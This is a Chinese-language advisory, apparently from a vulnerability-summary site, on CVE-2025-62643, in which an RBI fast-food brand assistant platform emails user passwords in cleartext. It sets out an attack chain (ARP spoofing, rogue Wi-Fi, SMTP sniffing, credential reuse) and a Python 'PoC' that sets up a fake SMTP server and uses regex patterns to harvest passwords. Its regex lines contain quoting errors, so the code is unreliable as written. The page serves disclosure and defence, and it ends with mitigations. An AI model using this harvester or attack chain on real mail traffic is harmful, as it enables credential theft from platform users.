CVE-2025-62643：RBI助手平台明文传输用户密码漏洞

漏洞信息

漏洞编号

CVE-2025-62643

漏洞类型

明文密码传输/信息泄露

CVSS评分

3.4 低危

攻击向量

邻接 (AV:A)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Restaurant Brands International (RBI) 助手平台（含Burger King、Tim Hortons、Popeyes、Firehouse Subs等品牌）

漏洞概述

CVE-2025-62643是存在于Restaurant Brands International（RBI）助手平台中的一个信息泄露漏洞。该平台服务于RBI旗下多个知名快餐品牌，包括Burger King（汉堡王）、Tim Hortons（蒂姆霍顿斯）、Popeyes（博派斯）及Firehouse Subs等连锁餐饮企业。漏洞影响截至2025年9月6日的所有版本。

该漏洞的核心问题在于平台在用户账户密码的传递过程中，未采用任何加密或脱敏处理，直接以明文形式通过电子邮件将用户密码发送给用户。这种做法在现代信息安全实践中属于严重的安全反模式，违反了密码管理的最佳实践和安全合规要求。正常情况下，系统应当通过安全的密码重置链接、临时令牌或一次性验证码等方式来验证用户身份，而非将明文密码通过不安全的邮件渠道传输。

根据CVSS 3.1评分系统，该漏洞评分为3.4分，属于低危级别。攻击向量为邻接网络（AV:A），攻击复杂度较高（AC:H），无需权限认证（PR:N），无需用户交互（UI:N）。尽管评分等级为低危，但其影响范围涉及C:L（低机密性影响），且安全态势分析表明该漏洞可能成为更大规模攻击链中的一个环节。该漏洞最初由安全研究员在bobdahacker.com博客上披露，随后被Malwarebytes等安全媒体广泛报道，引发了行业对快餐行业网络安全的高度关注。

技术细节

该漏洞的技术原理涉及RBI助手平台的用户认证和密码管理流程中的安全缺陷。具体技术细节如下：

1. **明文密码存储问题**：平台后端数据库以明文或可逆加密形式存储用户密码，而非采用bcrypt、Argon2等单向哈希算法。这意味着系统本身具备读取用户原始密码的能力，为明文传输埋下了隐患。

2. **邮件传输未加密**：当用户触发密码找回、密码重置或新账户创建等流程时，系统通过SMTP协议将包含明文密码的电子邮件发送给用户。邮件传输过程中若未启用TLS加密，密码可能在网络传输中被中间人攻击者截获。

3. **邮件存储安全隐患**：电子邮件本身具有多跳传输和长期存储的特性，明文密码一旦发送，将同时存在于发件服务器、中继服务器、收件服务器以及用户本地邮件客户端中，任何一个环节被攻陷都将导致密码泄露。

4. **邻接网络攻击场景**：CVSS向量中的AV:A（邻接网络）表明攻击者需要在与目标系统相同的逻辑或物理网络段中才能实施有效攻击，例如通过入侵企业内网、Wi-Fi中间人攻击或供应链攻击等方式获取邮件流量。

5. **利用方式**：攻击者可通过ARP欺骗、恶意Wi-Fi热点、网络嗅探等手段截获包含明文密码的邮件流量，或者直接入侵邮件服务器获取历史邮件记录，进而获取大量用户账户的明文凭证。

攻击链分析

STEP 1

步骤1：网络接入

攻击者通过入侵企业内网、部署恶意Wi-Fi热点或实施ARP欺骗等方式，获得与RBI助手平台邮件服务器相同网段的邻接网络访问权限。

STEP 2

步骤2：流量嗅探

攻击者在网络中部署流量嗅探工具（如Wireshark、tcpdump等），监控SMTP协议（端口25/587）或邮件中继服务器的通信流量，捕获明文传输的邮件内容。

STEP 3

步骤3：凭证提取

攻击者从截获的邮件流量中提取包含明文密码的字段，利用正则表达式或自动化脚本批量解析用户凭证信息。

STEP 4

步骤4：凭证利用

攻击者利用获取的明文凭证登录RBI助手平台，获取用户敏感信息、修改账户设置或以此为跳板实施进一步的内网渗透攻击。

STEP 5

步骤5：横向扩展

由于许多用户存在密码复用习惯，攻击者可尝试使用获取的凭证登录其他平台（如企业邮箱、社交媒体等），扩大攻击影响范围。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-62643 PoC - RBI Assistant Platform Cleartext Password Exposure
# This PoC demonstrates the vulnerability by intercepting cleartext passwords
# transmitted via email by the RBI assistant platform.

import smtpd
import asyncore
import email
import re

class CleartextPasswordSniffer(smtpd.SMTPServer):
    """
    SMTP server simulator that intercepts emails containing cleartext passwords
    sent by the RBI assistant platform.
    """

    def process_message(self, peer, mailfrom, rcpttos, data, **kwargs):
        print(f"[*] Intercepted email from: {mailfrom}")
        print(f"[*] Recipient(s): {rcpttos}")

        # Parse the email content
        msg = email.message_from_bytes(data)
        subject = msg.get('Subject', '')
        print(f"[*] Subject: {subject}")

        # Extract email body
        if msg.is_multipart():
            for part in msg.walk():
                content_type = part.get_content_type()
                if content_type == "text/plain" or content_type == "text/html":
                    body = part.get_payload(decode=True).decode('utf-8', errors='ignore')
                    self.extract_credentials(body)
        else:
            body = msg.get_payload(decode=True).decode('utf-8', errors='ignore')
            self.extract_credentials(body)

    def extract_credentials(self, body):
        """Extract cleartext passwords from email body using regex patterns."""
        # Common patterns for password disclosure in emails
        patterns = [
            r'password[:\s]+([A-Za-z0-9!@#$%^&*()_+={}\[\]:";'\"<>?,./~`-]{6,50})',
            r'Password[:\s]+([A-Za-z0-9!@#$%^&*()_+={}\[\]:";'\"<>?,./~`-]{6,50})',
            r'Your password is[:\s]+([A-Za-z0-9!@#$%^&*()_+={}\[\]:";'\"<>?,./~`-]{6,50})',
            r'pwd=([A-Za-z0-9!@#$%^&*()_+={}\[\]:";'\"<>?,./~`-]{6,50})',
            r'credentials[:\s]+(\w+:\w+)',
        ]

        for pattern in patterns:
            matches = re.findall(pattern, body, re.IGNORECASE)
            for match in matches:
                print(f"[!] CLEAREXT PASSWORD FOUND: {match}")

# Start the SMTP sniffer on port 25
if __name__ == "__main__":
    print("[*] Starting SMTP sniffer for CVE-2025-62643...")
    print("[*] Listening on 0.0.0.0:25")
    server = CleartextPasswordSniffer(('0.0.0.0', 25), None)
    try:
        asyncore.loop()
    except KeyboardInterrupt:
        print("\n[*] Sniffer stopped.")

影响范围

RBI助手平台 <= 2025-09-06

防御指南

临时缓解措施

在官方修复方案发布之前，建议RBI助手平台运营方立即采取以下临时缓解措施：1）暂停所有通过邮件发送明文密码的功能，改为发送密码重置链接；2）对所有SMTP通信强制启用TLS加密；3）通知所有用户立即更改平台密码，并在其他使用相同密码的平台上同步更换；4）部署网络监控规则，检测和告警包含关键词（如password、credentials等）的明文邮件传输；5）审查邮件服务器访问日志，排查是否存在未授权的凭证窃取行为；6）考虑临时启用IP白名单或VPN访问控制，限制对管理后台的访问。